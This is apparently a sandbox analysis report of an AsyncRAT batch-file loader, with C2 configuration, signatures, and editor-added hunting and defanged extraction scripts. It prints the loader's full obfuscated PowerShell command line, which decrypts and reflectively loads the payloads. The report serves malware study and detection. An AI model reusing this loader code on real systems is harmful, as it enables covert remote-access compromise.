Resubmissions (date, analysis ID, score)
23-05-2024 05:33  240523-f8yy7afc8w  10
22-05-2024 19:39  240522-yc9d6adh9s  10
22-05-2024 19:09  240522-xtyhjsdb21  10
22-05-2024 19:06  240522-xscvfsda5y  10
22-05-2024 16:28  240522-tyxj9shb7z  10

Analysis
- max time kernel: 61s
- max time network: 64s
- platform: windows10-2004_x64
- resource: win10v2004-20240508-en
- resource tags: arch:x64, arch:x86, image:win10v2004-20240508-en, locale:en-us, os:windows10-2004-x64, system
- submitted: 22-05-2024 16:28
Static task
static1
General
- Target: Inital.bat
- Size: 63KB
- MD5: e9319ac7284b6bbadf0200fee286b6c1
- SHA1: 51c30382aa103118937f1a9bf453a8345febafb4
- SHA256: 09d4308c18ecece489a51b7837968bcfc6c1273d83f5c83614bbdd119ccf6961
- SHA512: 73e349b61c285cdb3cfdf41ae9ba166cc0f8e5c7b989bf744f9aa8433baf41ea3a01b46fa9a88cc97fa4ca5d80f57a9dbd8fea631a164566c9e95632c9f3404b
- SSDEEP: 1536:Z6e+aDqc6V/xOtoqfF4OycI/k0xqAD/xtM:Z6aDqpVuoqKL5fkAvM
Malware Config
Extracted: asyncrat
- version: 0.5.8
- botnet: RATED
- C2: 147.185.221.17:25565
- C2: 147.185.221.17:37531
- mutex: Dudee4vQEqBD
- delay: 3
- install: false
- install_file: AnticheatBiner.exe
- install_folder: %AppData%
Note: install is false, so the install_file/install_folder values describe a persistence location this build was configured not to use; the RAT runs only inside the PowerShell process that loaded it.
Signatures
- Async RAT payload (1 IoC)
  resource behavioral1/memory/3956-24-0x0000000006D80000-0x0000000006D92000-memory.dmp matched yara_rule family_asyncrat
- Blocklisted process makes network request (5 IoCs)
  powershell.exe pid 3956: flows 21, 43, 48, 49, 50
- Command and Scripting Interpreter: PowerShell (1 TTP, 3 IoCs)
  Run PowerShell and hide display window.
  powershell.exe pids 3956, 824, 1768
- Suspicious behavior: EnumeratesProcesses (7 IoCs)
  powershell.exe pid 3956 (2 hits), pid 824 (3 hits), pid 1768 (2 hits)
- Suspicious use of AdjustPrivilegeToken (3 IoCs)
  Token: SeDebugPrivilege requested by powershell.exe pids 3956, 824, 1768
- Suspicious use of WriteProcessMemory (9 IoCs)
  cmd.exe PID 904 wrote to memory of powershell.exe PID 3956 (3 times)
  cmd.exe PID 3528 wrote to memory of powershell.exe PID 824 (3 times)
  cmd.exe PID 3960 wrote to memory of powershell.exe PID 1768 (3 times)
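The signatures above describe one execution chain: cmd.exe runs a .bat, which spawns a hidden, execution-policy-bypassing powershell.exe that decrypts and reflectively loads an assembly. The following hunting filter is an added example written for this page; it is not part of the sandbox report or of the sample. The indicator regexes are derived from the loader command line recorded in the process tree of this report, the Sysmon channel name and the "two indicators plus a .bat parent" threshold are the editor's assumptions, and the two command lines at the bottom are constructed samples, not log data.

```powershell
# Added example (editor's code, not from the report): hunt for the cmd.exe /c <x>.bat -> hidden
# powershell.exe -ep bypass -> in-memory decrypt + Assembly.Load chain seen in this analysis.
# Indicator regexes are derived from the recorded loader command line; the threshold is the editor's.
$LoaderIndicators = @(
    @{ Name = 'hidden window';             Pattern = '(?i)-windowstyle\s+hidden' },
    @{ Name = 'execution policy bypass';   Pattern = '(?i)-(ep|executionpolicy)\s+bypass' },
    @{ Name = 'reversed-string API name';  Pattern = "'[A-Za-z0-9]+'\[-1\.\.-\d+\]\s*-join\s*''" },
    @{ Name = 'in-memory AES decrypt';     Pattern = '(?i)\[System\.Security\.Cryptography\.Aes\]::Create' },
    @{ Name = 'self-reading .bat carrier'; Pattern = "(?i)\.StartsWith\(':: '\)" },
    @{ Name = 'reflective assembly load';  Pattern = '(?i)\[System\.Reflection\.Assembly\]::' }
)

function Test-BatLoaderChain {
    param([string] $ParentCommandLine = '', [string] $CommandLine = '')
    # Collect the names of every indicator the child command line matches.
    $hits = @(foreach ($ind in $LoaderIndicators) { if ($CommandLine -match $ind.Pattern) { $ind.Name } })
    # Parent must be cmd.exe running a .bat (the delivery vehicle in this report).
    $batParent = [bool]($ParentCommandLine -match '(?i)\bcmd\.exe\b.*\s/c\s+"*.+\.bat')
    [pscustomobject]@{
        BatParent  = $batParent
        Indicators = $hits
        # Assumption: .bat parent plus at least two independent loader traits; tune for your estate.
        Suspicious = ($batParent -and $hits.Count -ge 2)
    }
}

# Live hunt over Sysmon Event ID 1 (ProcessCreate), which records CommandLine and ParentCommandLine.
# Assumes Sysmon is installed and logs to its default channel.
function Find-BatLoaderChains {
    Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-Sysmon/Operational'; Id = 1 } -ErrorAction Stop |
      ForEach-Object {
        $ev = [xml]$_.ToXml()
        $d  = @{}
        foreach ($n in $ev.Event.EventData.Data) { $d[$n.Name] = $n.'#text' }
        if ($d['Image'] -like '*\powershell.exe') {
            $r = Test-BatLoaderChain -ParentCommandLine $d['ParentCommandLine'] -CommandLine $d['CommandLine']
            if ($r.Suspicious) {
                [pscustomobject]@{ Time = $_.TimeCreated; ProcessId = $d['ProcessId']; Hits = ($r.Indicators -join ', '); CommandLine = $d['CommandLine'] }
            }
        }
      }
}

# Constructed samples (not log data from the report): the recorded chain, abbreviated, and a benign one.
$loaderLike = Test-BatLoaderChain `
    -ParentCommandLine 'C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Inital.bat"' `
    -CommandLine ('powershell.exe -noprofile -windowstyle hidden -ep bypass -command ' +
                  "[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')(`$x); " +
                  "[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]`$p)")
$benign = Test-BatLoaderChain `
    -ParentCommandLine 'C:\Windows\system32\cmd.exe /c "C:\Scripts\backup.bat"' `
    -CommandLine 'powershell.exe -noprofile -command Get-Date'
$loaderLike, $benign | Format-Table BatParent, Suspicious, @{ n = 'Indicators'; e = { $_.Indicators -join ', ' } }
```

On the constructed samples, the loader-like pair reports BatParent true with four indicators (hidden window, execution policy bypass, reversed-string API name, reflective assembly load) and is flagged; the benign backup.bat pair has a .bat parent but no indicators and is not. Administrative scripts legitimately use -windowstyle hidden and -ep bypass, which is why a single indicator is not enough; the reversed-string and Assembly.Load traits carry the signal here.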
Processes
- C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Inital.bat"
  signatures: Suspicious use of WriteProcessMemory
  - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('rQsZbBPOPJCvxNhL0LUES/xBoGdJPo5xjQuRz/WAY2Y='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('DjbA3otpI3NZoCoqJZkIpQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $XrWyO=New-Object System.IO.MemoryStream(,$param_var); $udTvC=New-Object System.IO.MemoryStream; $DGCBl=New-Object System.IO.Compression.GZipStream($XrWyO, [IO.Compression.CompressionMode]::Decompress); $DGCBl.CopyTo($udTvC); $DGCBl.Dispose(); $XrWyO.Dispose(); $udTvC.Dispose(); $udTvC.ToArray();}function execute_function($param_var,$param2_var){ $ILwNn=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $XDsjo=$ILwNn.EntryPoint; $XDsjo.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\Inital.bat';$AUAcT=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Inital.bat').Split([Environment]::NewLine);foreach ($RmJpd in $AUAcT) { if ($RmJpd.StartsWith(':: ')) { $jmZjY=$RmJpd.Substring(3); break; }}$payloads_var=[string[]]$jmZjY.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
    signatures: Blocklisted process makes network request; Command and Scripting Interpreter: PowerShell; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
    What this loader does: the reversed string literals are method names ('gnirtS46esaBmorF' is FromBase64String, 'txeTllAdaeR' is ReadAllText, 'daoL' is Load), spelled backwards and resolved at run time so that the plain names never appear in the command line. The script reads Inital.bat itself, takes the first line beginning with ":: " (a comment to cmd.exe, the payload carrier to PowerShell), splits it on "\" into two base64 blobs, and for each blob base64-decodes, AES-256-CBC-decrypts with the hard-coded 32-byte key and 16-byte IV (PKCS7 padding), and gzip-decompresses. Both results are loaded as .NET assemblies with Assembly.Load and their entry points invoked inside this 32-bit (SysWOW64) PowerShell process; the second is passed an empty string[] as its argument list. No stage is written to disk, which is why the AsyncRAT detection is a memory hit (memory/3956-24-0x0000000006D80000-0x0000000006D92000-memory.dmp) and the dropped-file list below contains only PowerShell runtime artifacts.
- C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
  (top-level shell32 COM local-server activation, no signature hits)
- C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Inital.bat" "
  signatures: Suspicious use of WriteProcessMemory
  - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -noprofile -windowstyle hidden -ep bypass -command ... (identical command line to the first powershell.exe above)
    signatures: Command and Scripting Interpreter: PowerShell; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
- C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Inital.bat" "
  signatures: Suspicious use of WriteProcessMemory
  - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -noprofile -windowstyle hidden -ep bypass -command ... (identical command line to the first powershell.exe above)
    signatures: Command and Scripting Interpreter: PowerShell; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
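Because the loader keeps its key, IV and decode pipeline in the command line, the stage-2 assemblies can be recovered statically without ever running them. The script below is an added example written for this page, not code from the report or from the sample: it re-implements the loader's carrier-line, base64, AES-CBC and gzip stages with the same parameters, but replaces Assembly.Load()/Invoke() with writing each blob to disk and hashing it. The output directory default and the payloadN.bin naming are the editor's assumptions. Run it in an isolated analysis VM.

```powershell
# Added example (editor's code, not from the report or the sample): defanged extractor for the
# Inital.bat loader. Same key/IV/cipher/compression as the observed command line, but the two
# decoded assemblies are written to disk and hashed instead of being loaded and invoked.
# Assumptions: output directory default and payloadN.bin naming are the editor's choice.
param(
    [Parameter(Mandatory)] [string] $BatPath,                  # e.g. .\Inital.bat
    [string] $OutDir = (Join-Path (Get-Location) 'extracted')  # assumption: editor's default
)

# Key (32 bytes, so AES-256) and IV (16 bytes) exactly as hard-coded in the loader command line.
$KeyB64 = 'rQsZbBPOPJCvxNhL0LUES/xBoGdJPo5xjQuRz/WAY2Y='
$IvB64  = 'DjbA3otpI3NZoCoqJZkIpQ=='

function Unprotect-AesCbc {
    param([byte[]] $Data, [byte[]] $Key, [byte[]] $Iv)
    $aes = [System.Security.Cryptography.Aes]::Create()
    try {
        $aes.Mode    = [System.Security.Cryptography.CipherMode]::CBC
        $aes.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7
        $aes.Key = $Key
        $aes.IV  = $Iv
        $dec = $aes.CreateDecryptor()
        try { $plain = $dec.TransformFinalBlock($Data, 0, $Data.Length) } finally { $dec.Dispose() }
    } finally { $aes.Dispose() }
    return ,$plain   # leading comma keeps the byte[] from being unrolled by the pipeline
}

function Expand-GzipBytes {
    param([byte[]] $Data)
    $in  = New-Object System.IO.MemoryStream(,$Data)
    $out = New-Object System.IO.MemoryStream
    $gz  = New-Object System.IO.Compression.GZipStream($in, [IO.Compression.CompressionMode]::Decompress)
    try { $gz.CopyTo($out) } finally { $gz.Dispose(); $in.Dispose() }
    $bytes = $out.ToArray()
    $out.Dispose()
    return ,$bytes
}

# Carrier line: the loader takes the first line of its own .bat that starts with ':: '.
# cmd.exe treats it as a comment; the loader treats it as two base64 blobs joined by '\'.
$carrier = Get-Content -LiteralPath $BatPath | Where-Object { $_.StartsWith(':: ') } | Select-Object -First 1
if (-not $carrier) { throw "no ':: ' carrier line found in $BatPath" }

$null = New-Item -ItemType Directory -Force -Path $OutDir
$key  = [Convert]::FromBase64String($KeyB64)
$iv   = [Convert]::FromBase64String($IvB64)

$i = 0
foreach ($blob in $carrier.Substring(3).Split('\')) {
    $cipher = [Convert]::FromBase64String($blob)
    $plain  = Expand-GzipBytes (Unprotect-AesCbc -Data $cipher -Key $key -Iv $iv)
    $dest   = Join-Path $OutDir ('payload{0}.bin' -f $i)
    [IO.File]::WriteAllBytes($dest, $plain)
    # 'MZ' at offset 0 means a PE image, which is what Assembly.Load expects here.
    $isPe   = ($plain.Length -ge 2 -and $plain[0] -eq 0x4D -and $plain[1] -eq 0x5A)
    $sha256 = (Get-FileHash -Algorithm SHA256 -LiteralPath $dest).Hash
    '{0}: {1} bytes, PE={2}, SHA256={3}' -f $dest, $plain.Length, $isPe, $sha256
    $i++
}
```

Usage: save as Extract-BatLoader.ps1 and run `.\Extract-BatLoader.ps1 -BatPath .\Inital.bat`; feed the resulting payloadN.bin files to a .NET decompiler to recover the AsyncRAT configuration listed under Malware Config. If TransformFinalBlock throws a padding CryptographicException, the stub has been re-keyed: take the new key and IV from that sample's own command line, since each build embeds its own.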
Network
MITRE ATT&CK Matrix ATT&CK v13
Downloads
Note: all four files below are ordinary PowerShell/CLR runtime artifacts (the CLR usage log, the module analysis cache, the non-interactive startup profile cache, and the __PSScriptPolicyTest_*.ps1 probe PowerShell writes to test script policy on start-up). The sample writes no payload to disk; the decoded stages exist only in the memory regions listed after the files.
- C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
  Filesize: 1KB
  MD5: 6195a91754effb4df74dbc72cdf4f7a6
  SHA1: aba262f5726c6d77659fe0d3195e36a85046b427
  SHA256: 3254495a5513b37a2686a876d0040275414699e7ce760e7b5ee05e41a54b96f5
  SHA512: ed723d15de267390dc93263538428e2c881be3494c996a810616b470d6df7d5acfcc8725687d5c50319ebef45caef44f769bfc32e0dc3abd249dacff4a12cc89
- C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
  Filesize: 53KB
  MD5: 06ad34f9739c5159b4d92d702545bd49
  SHA1: 9152a0d4f153f3f40f7e606be75f81b582ee0c17
  SHA256: 474813b625f00710f29fa3b488235a6a22201851efb336bddf60d7d24a66bfba
  SHA512: c272cd28ae164d465b779163ba9eca6a28261376414c6bbdfbd9f2128adb7f7ff1420e536b4d6000d0301ded2ec9036bc5c657588458bff41f176bdce8d74f92
- C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  Filesize: 16KB
  MD5: d698d5937b0204919ccb06a782c042d1
  SHA1: 5f4c02afe416a24d7088a6871c7b47ae36385ddc
  SHA256: 87f0fd106d1323c21a53129669dd49574f73c872234a3041cda0b6ffc6351ecc
  SHA512: f284a51d82714418699b7e485394fd4d2586548869c7c430808c3755d34e80ba936559ae13a22e08c78e9fe3092667b607b10e51059cf5fbcbaad58e19c9250b
- C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_owm1vz5k.iq3.ps1
  Filesize: 60B
  MD5: d17fe0a3f47be24a6453e9ef58c94641
  SHA1: 6ab83620379fc69f80c0242105ddffd7d98d5d9d
  SHA256: 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
  SHA512: 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Memory dumps (pid-index-range, size)
- memory/824-43-0x0000000074510000-0x0000000074CC0000-memory.dmp  7.7MB
- memory/824-39-0x0000000074510000-0x0000000074CC0000-memory.dmp  7.7MB
- memory/824-38-0x0000000074510000-0x0000000074CC0000-memory.dmp  7.7MB
- memory/824-28-0x0000000074510000-0x0000000074CC0000-memory.dmp  7.7MB
- memory/3956-20-0x00000000073A0000-0x0000000007A1A000-memory.dmp  6.5MB
- memory/3956-26-0x000000007451E000-0x000000007451F000-memory.dmp  4KB
- memory/3956-19-0x0000000005C40000-0x0000000005C8C000-memory.dmp  304KB
- memory/3956-18-0x0000000005B90000-0x0000000005BAE000-memory.dmp  120KB
- memory/3956-0-0x000000007451E000-0x000000007451F000-memory.dmp  4KB
- memory/3956-21-0x0000000006D20000-0x0000000006D3A000-memory.dmp  104KB
- memory/3956-22-0x0000000006D50000-0x0000000006D58000-memory.dmp  32KB
- memory/3956-23-0x0000000006D60000-0x0000000006D6E000-memory.dmp  56KB
- memory/3956-24-0x0000000006D80000-0x0000000006D92000-memory.dmp  72KB  (family_asyncrat YARA hit)
- memory/3956-17-0x00000000056B0000-0x0000000005A04000-memory.dmp  3.3MB
- memory/3956-27-0x0000000074510000-0x0000000074CC0000-memory.dmp  7.7MB
- memory/3956-7-0x0000000005640000-0x00000000056A6000-memory.dmp  408KB
- memory/3956-6-0x00000000055D0000-0x0000000005636000-memory.dmp  408KB
- memory/3956-5-0x0000000004CE0000-0x0000000004D02000-memory.dmp  136KB
- memory/3956-3-0x0000000074510000-0x0000000074CC0000-memory.dmp  7.7MB
- memory/3956-4-0x0000000074510000-0x0000000074CC0000-memory.dmp  7.7MB
- memory/3956-2-0x0000000004D70000-0x0000000005398000-memory.dmp  6.2MB
- memory/3956-1-0x00000000046E0000-0x0000000004716000-memory.dmp  216KB